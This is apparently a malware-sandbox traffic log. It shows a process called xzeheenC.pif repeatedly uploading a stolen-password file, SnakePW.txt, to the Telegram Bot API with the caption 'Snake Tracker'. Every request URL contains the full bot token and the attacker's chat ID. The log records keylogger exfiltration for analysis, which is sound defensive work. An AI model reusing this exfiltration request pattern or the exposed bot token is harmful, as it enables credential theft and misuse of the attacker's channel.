2024-12-18 15:31:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:50 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419140,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535910,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.8 | 49790 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:50 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2164183e6431
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:50 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd2164183e6431Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:51 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419142,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535910,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.8 | 49795 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:51 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20ff88b239de
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:51 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd20ff88b239deContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:51 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:51 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419144,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535911,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.8 | 49796 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:51 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd209cd6857f2c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:51 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd209cd6857f2cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:52 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:52 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419146,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535912,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.8 | 49798 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:52 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd217f06734e57
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:52 UTC | 535 | OUT | Data Ascii: --------------------------8dd217f06734e57Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:52 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:52 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419148,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535912,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.8 | 49803 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:53 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd211870eb7966
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:53 UTC | 535 | OUT | Data Ascii: --------------------------8dd211870eb7966Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:53 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:53 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:53 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419150,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535913,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.8 | 49804 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:53 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20b3594cb916
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
2024-12-18 15:31:53 UTC | 535 | OUT | Data Ascii: --------------------------8dd20b3594cb916Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:54 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:54 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:54 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419152,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535914,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.8 | 49806 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:54 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd219ef909f384
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:54 UTC | 535 | OUT | Data Ascii: --------------------------8dd219ef909f384Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:55 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:54 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:55 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419154,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535914,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.8 | 49807 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:55 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd213292786ec5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:55 UTC | 535 | OUT | Data Ascii: --------------------------8dd213292786ec5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:56 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:55 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:56 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419156,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535915,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.8 | 49812 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:55 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20c87699746c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:55 UTC | 535 | OUT | Data Ascii: --------------------------8dd20c87699746cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:56 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:56 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:56 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419158,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535916,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.8 | 49814 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:56 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21c3e3b174c0
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:56 UTC | 535 | OUT | Data Ascii: --------------------------8dd21c3e3b174c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:57 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:56 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:57 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419160,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535916,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.8 | 49815 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:57 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2150839db402
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:57 UTC | 535 | OUT | Data Ascii: --------------------------8dd2150839db402Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:57 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:57 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:57 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419162,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535917,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.8 | 49820 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:57 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20dd81284159
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:31:57 UTC | 535 | OUT | Data Ascii: --------------------------8dd20dd81284159Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:58 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:58 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:58 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419164,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535918,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.8 | 49822 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:58 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21e620954fe3
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:58 UTC | 535 | OUT | Data Ascii: --------------------------8dd21e620954fe3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:59 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:58 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:59 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419166,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535918,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.8 | 49823 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:59 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2170f0ccb8bf
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:59 UTC | 535 | OUT | Data Ascii: --------------------------8dd2170f0ccb8bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:59 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:59 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:59 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419168,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535919,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.8 | 49824 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:59 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20f3c83870c3
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:59 UTC | 535 | OUT | Data Ascii: --------------------------8dd20f3c83870c3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:00 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:00 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:00 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419170,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535920,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.8 | 49829 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:00 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd220d4b323153
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:00 UTC | 535 | OUT | Data Ascii: --------------------------8dd220d4b323153Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:00 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
